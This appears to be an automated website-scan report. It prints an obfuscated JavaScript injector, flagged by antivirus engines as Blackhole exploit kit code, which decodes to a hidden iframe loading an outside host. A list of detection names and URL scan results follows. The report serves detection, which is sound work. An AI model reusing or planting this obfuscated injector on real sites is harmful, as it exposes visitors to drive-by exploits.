Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery.flexslider.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |